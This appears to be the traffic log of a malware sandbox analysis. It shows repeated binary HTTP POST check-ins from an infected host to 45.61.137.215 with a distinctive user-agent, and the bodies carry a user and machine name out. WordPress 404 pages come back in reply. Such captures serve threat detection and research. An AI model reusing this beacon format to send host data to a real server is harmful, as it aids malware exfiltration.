May 29, 2024 15:45:42.445722103 CEST	1236	IN	Data Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
May 29, 2024 15:45:42.445738077 CEST	108	IN	Data Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
May 29, 2024 15:45:42.445755005 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 29, 2024 15:45:42.445764065 CEST	1236	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.2.9	49797	45.61.137.215	80

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:45:42.784784079 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:45:42.790692091 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:45:45.271228075 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:45:43 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:45:45.271294117 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:45:45.271316051 CEST	448	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:45:45.271332026 CEST	1236	IN	Data Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
May 29, 2024 15:45:45.271368980 CEST	1236	IN	Data Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
May 29, 2024 15:45:45.271384954 CEST	448	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77 Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
May 29, 2024 15:45:45.271403074 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:45:45.271420002 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:45:45.271435976 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:45:45.271454096 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.9	49798	45.61.137.215	80

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:45:45.418560982 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:45:45.424213886 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:45:47.941653967 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:45:45 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:45:47.941711903 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:45:47.941747904 CEST	448	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:45:47.941873074 CEST	1236	IN	Data Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
May 29, 2024 15:45:47.941939116 CEST	1236	IN	Data Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
May 29, 2024 15:45:47.941987991 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77 Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
May 29, 2024 15:45:47.942023039 CEST	1236	IN	Data Raw: 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 2c 32 30 36 2c 32 33 36 29 20 30 25 2c 72 67 62 28 31 35 32 2c 31 35 30 2c 32 34 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 Data Ascii: near-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(13
May 29, 2024 15:45:47.942058086 CEST	328	IN	Data Raw: 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 Data Ascii: ed: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}body .
May 29, 2024 15:45:47.942112923 CEST	1236	IN	Data Raw: 30 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 7b 64 69 73 70 6c 61 79 3a 20 67 72 69 64 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 20 3e 20 2a 7b 6d 61 72 67 69 6e 3a 20 30 3b 7d 3a 77 68 65 72 65 28 Data Ascii: 0;}body .is-layout-grid{display: grid;}body .is-layout-grid > *{margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where
May 29, 2024 15:45:47.942147017 CEST	1236	IN	Data Raw: 64 2d 70 75 72 70 6c 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 62 6c 61 63 Data Ascii: d-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.9	49799	45.61.137.215	80

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:45:48.086059093 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:45:48.091593981 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:45:50.576786995 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:45:48 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:45:50.576813936 CEST	224	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
May 29, 2024 15:45:50.576833963 CEST	1236	IN	Data Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
May 29, 2024 15:45:50.576847076 CEST	224	IN	Data Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener(
May 29, 2024 15:45:50.576920986 CEST	1236	IN	Data Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
